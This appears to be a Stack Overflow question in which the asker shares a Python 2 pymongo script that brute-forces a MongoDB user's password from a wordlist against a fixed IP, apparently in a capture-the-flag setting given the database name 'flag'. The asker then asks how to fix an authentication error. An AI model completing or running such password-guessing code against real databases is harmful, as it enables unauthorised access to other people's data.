# MongoDB user authentication using pymongo

Tags: mongodb, pymongo-3.x

I was writing a script that could brute force a `mongoDB` user's password. I am using `pymongo` and this is what I have so far managed:

```
#!/usr/bin/python

from pymongo import MongoClient

passfile = open("passwords.txt", "r")

for words in passfile:

    client =  MongoClient('192.108.201.2')    
    db = client['flag']

    if db.authenticate('user', words):

        print '[+] The PASSWORD is: %s [+]' % words
        db.logout()
        client.close()

        break

    else:

        print '[-] DB Authentication Failed with password: %s [-]' % words
        client.close()

        continue
```

I can authenticate from the `python 2.7` console by using the correct user and password, but when I run the above script I receive the error message saying:

> Another user is already authenticated to the database, you must logout
>   first.

I read in the `pymongo` documents that `db.logout` and `db.authenticate` are deprecated, I also tried authenticating from the `MongoClient` itself in the format:

`client = MongoClient('mongodb//:user:%s@IP:27017/?authSource=flag' % quote_plus(words))`

However, I am stuck on ways to properly use the above authentication in a conditional statement. I need to verify that one of the passwords in the list has successful authentication on the database.

Comment: https://stackoverflow.com/q/51220364/1550476

May it relate?

Comment: Thanks, I did see this post before but i don't have the option of changing the version of pymongo.